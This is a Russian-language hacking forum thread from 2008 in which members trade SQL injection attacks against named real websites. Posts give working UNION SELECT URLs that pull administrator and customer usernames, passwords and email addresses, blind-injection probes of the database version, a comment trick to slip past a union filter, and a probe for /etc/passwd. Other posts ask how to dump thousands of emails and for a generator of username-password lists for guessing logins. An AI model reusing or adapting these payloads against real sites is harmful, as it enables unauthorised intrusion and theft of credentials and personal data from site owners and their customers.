Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Вроде нельзя по провам юзера просматривать их, если я ниче не путаю
     
  2. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    http://www.bikemaster.ru/popup_image1.php?pID=-1'
     
  3. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    +) Я чет файл popup_image1.php даже вблизи не видел на сайте :)
     
  4. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Оно просто не отображает или иньекция слепая?
    Code:
    http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_password),3,4,5+from+administrators--
    или:
    Code:
    http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a.customers_password.0x3a.customers_email_address).4.5.6.7.8+from+customers--
     
  5. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    А вот это хз, не раскручивал)
     
  6. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Иньекция кажется слепая. А вот это что такое:
    Code:
    http://www.bikemaster.ru/etc/passwd
    Раз не пишет, что не найдена страница, значит оно есть :) Но что ето?

    Кажется сайт неплохо защитили.
     
  7. 2la.painkiller

    2la.painkiller New Member

    Joined:
    22 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    -10
    Нет всё там нормально!
    http://bikemaster.ru/popup_image1.php?pID=-1'+union+select+1,unhex(hex(concat_ws(user_name,0x3a,user_password))),3,4,5+from+0x61646d696e6973747261746f7273/*
     
    #2647 2la.painkiller, 19 Jul 2008
    Last edited: 19 Jul 2008
  8. 2la.painkiller

    2la.painkiller New Member

    Joined:
    22 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    -10
    Хелп не могу сделать запрос
    http://www.autoexotica.ru/news/?nid=128' дыра
    http://www.autoexotica.ru/news/?nid=128+order+by+11/* колонок
    http://www.autoexotica.ru/news/?nid=128+union+select+1,2,3,4,5,6,7,8,9,10,11/*
    Пишет ошибку как так?
    You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10,11/*' at line 1
    SELECT *, DATE_FORMAT(date, "%d.%m.%y") AS frm_date FROM news_data WHERE news_id=128 union select 1,2,3,4,5,6,7,8,9,10,11/*
     
  9. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109

    Дело в том что на сервере стоит 3 версия MySQL которая не поддерживает в подзапросах union
    http://www.autoexotica.ru/news/?nid=128+AND+ascii(lower(substring(version(),1,1)))=51
     
  10. 2la.painkiller

    2la.painkiller New Member

    Joined:
    22 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    -10
    Ни чего не выводит в таком запросе ( И что такое наконце 51 ?
    где можно почитать про взлом 3 версии?
     
  11. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2 2la.painkiller та не в запросе просто опечатка должно быть
    substring(version(),1,1)=3/*
    почитать можно на ачате вота линк
    http://forum.antichat.ru/showpost.php?p=565034&postcount=4
    пора бы уж хотя бы форуму научиться поиск делать ;)
     
  12. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    1064 - You have an error in your SQL syntax near 'union select ...

    Когда убираешь кавычку перед union, то вообще пустой экран.
     
  13. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109

    какая нахрен опечатка?
    ascii там не зря стоит...
    http://www.securitylab.ru/contest/212099.php
     
  14. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    есть sql inject, но с лимитом! Есть желание вытащить базу емайлов,но их можно просматривать только по одному, а их > нескольких тысяч,как вытащить?
     
  15. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    юзай сипт http://forum.antichat.ru/thread24918.html
     
  16. c0rp$e

    c0rp$e Elder - Старейшина

    Joined:
    5 Dec 2003
    Messages:
    206
    Likes Received:
    37
    Reputations:
    -5
    Ребят, подскажите пли3 универсальный, хороший генератор паролей.
    Для создания листов user;password
    самое главное чтобы там была возможность-
    1. создание листа, где пароль повторяет имя юзера... ( т.е. берет из файла логины и приписывает, повторяет, логин в пароль...
    Спасибо
     
  17. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    А помоему зря - версия БД начинается, всё равно, с цифр (другого я не видел, по крайней мере если БД - мускул), поэтому что бы узнать первую цифру версии использовать ascii() не обязательно.
    А вот для вывода не цифровых данных использовать ascii() в общем случае нужно.
     
  18. Zircool

    Zircool Elder - Старейшина

    Joined:
    1 Mar 2006
    Messages:
    162
    Likes Received:
    37
    Reputations:
    5
    Никак не получается раскрутить инъекцию

    как только пытаюсь раскрутить пишет
     
  19. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Какими запросами крутишь?
    пишешь так:
    Code:
    http://storm.ikit.kg/stats/stats.php?game=D2XP&type=SC&sortBy=rank&sort_direction=1+union+select+1
    Он ругается
    а так:
    Code:
    http://storm.ikit.kg/stats/stats.php?game=D2XP&type=SC&sortBy=rank&sort_direction=1+union/**/select+1
    уже нет,значит скрипт плюется от union+select...делай выводы
    ЗЫ:Я сам пока толком не крутил и не понял
     
    #2659 DDoSька, 21 Jul 2008
    Last edited: 21 Jul 2008
  20. Zircool

    Zircool Elder - Старейшина

    Joined:
    1 Mar 2006
    Messages:
    162
    Likes Received:
    37
    Reputations:
    5
    Все равно вывести ничего не получается((((
     
    1 person likes this.
Thread Status:
Not open for further replies.